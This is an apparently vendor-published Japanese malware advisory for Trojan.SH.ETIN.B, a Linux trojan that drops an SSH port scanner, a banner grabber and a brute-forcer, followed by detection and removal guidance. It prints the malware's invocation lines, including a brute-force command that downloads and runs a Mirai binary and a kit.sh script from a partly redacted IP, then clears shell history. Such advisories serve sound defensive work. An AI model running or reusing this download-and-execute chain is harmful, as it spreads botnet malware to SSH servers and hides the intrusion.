
Trojan.SH.ETIN.B
2020年5月21日
別名:
N/A
プラットフォーム:
Linux/Unix
危険度:
ダメージ度:
感染力:
感染確認数:
情報漏えい:

- マルウェアタイプ: トロイの木馬型
- 破壊活動の有無: なし
- 暗号化: なし
- 感染報告の有無: はい
概要
感染経路 インターネットからのダウンロード, 他のマルウェアからの作成
マルウェアは、リモートサイトから他のマルウェアまたはグレイウェアにダウンロードされ、コンピュータに侵入します。
詳細
ファイルサイズ 1,226 bytes
タイプ Other
メモリ常駐 なし
発見日 2020年5月20日
ペイロード ファイルの削除, ファイルのダウンロード, プロセスの強制終了, URLまたはIPアドレスに接続, ファイルの実行
侵入方法
マルウェアは、リモートサイトから以下のマルウェアまたはグレイウェアにダウンロードされ、コンピュータに侵入します。
インストール
マルウェアは、以下のファイルを作成します。
- /{Malware Path}/motd
- /{Malware Path}/shitscanner → Detected as HackingTools_Shark
- A scanner that will search for hosts in the internet with an open Port 22.
- The results will be stored in bios.txt
- It accepts the following parameters:
- Port Number
- -a or -b (class)
- -a (A network) must be between 1 and 254
- -b (B network) example: 192.168
- -i (interface)
- -s (speed)
- /{Malware Path}/boner → Detected as HackTool.Linux.BANGRAB.A
- Grabs the banner of the IP addresses indicated in the "infile" paramater
- The results will be stored in banner.log
- The contents of banner.log will then be filtered by listing IP addresses of machines with OpenSSH running on Port 22.
- The filtered list will be stored on mfu.txt
- It accepts the following parameters:
- infile - a text file that contains IP addresses
- port
- threads - concurrent IPs being scanned
- /{Malware Path}/brute → Detected as HackTool.Linux.SSHBRUTE.GA
- a Haiduc scanner
- It will use the following as arguments to connect, download and execute files to gain control over its target:
- http://{BLOCKED}.{BLOCKED}.17.186/kit.sh → Detected as Trojan.SH.ETIN.A
- http://{BLOCKED}.{BLOCKED}.17.186/AB4g5/kiga.x86 → Detected as IoT.Linux.MIRAI.VWISH
- Successfully compromised machines will be saved in gasite.txt
他のシステム変更
マルウェアは、以下のファイルを削除します。
- /{Malware Path}/bios.txt
- /{Malware Path}/mfu.txt
- /{Malware Path}/banner.log
プロセスの終了
マルウェアは、感染コンピュータ上で以下のプロセスが常駐されていることを確認した場合、そのプロセスを終了します。
- shitscanner
- boner
その他
マルウェアは、以下を実行します。
- It executes the dropped files with the following paramaters:
- timeout $timeout ./{Malware Path}/shitscanner $port -i $interface -s $speed
- where:
- $timeout - 130
- $port - 22
- $interface - eth0
- $speed - 10
- ./{Malware Path}/boner bios.txt 22 3500
- ./{Malware Path}/brute 9999 -f mfu.txt pass_file 22 "wget http://{BLOCKED}.{BLOCKED}.17.186/AB4g5/kiga.x86 ;chmod 777 *; ./kiga.x86 ROOTS; rm -rf kiga*;wget http://{BLOCKED}.{BLOCKED}.17.186/kit.sh ;sh kit.sh; history -c"
- where:
- pass_file - list of credentials stored
対応方法
対応検索エンジン: 9.850
初回 VSAPI パターンバージョン 15.882.02
初回 VSAPI パターンリリース日 2020年5月20日
VSAPI OPR パターンバージョン 15.883.00
VSAPI OPR パターンリリース日 2020年5月21日
最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.SH.ETIN.B」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
ご利用はいかがでしたか? アンケートにご協力ください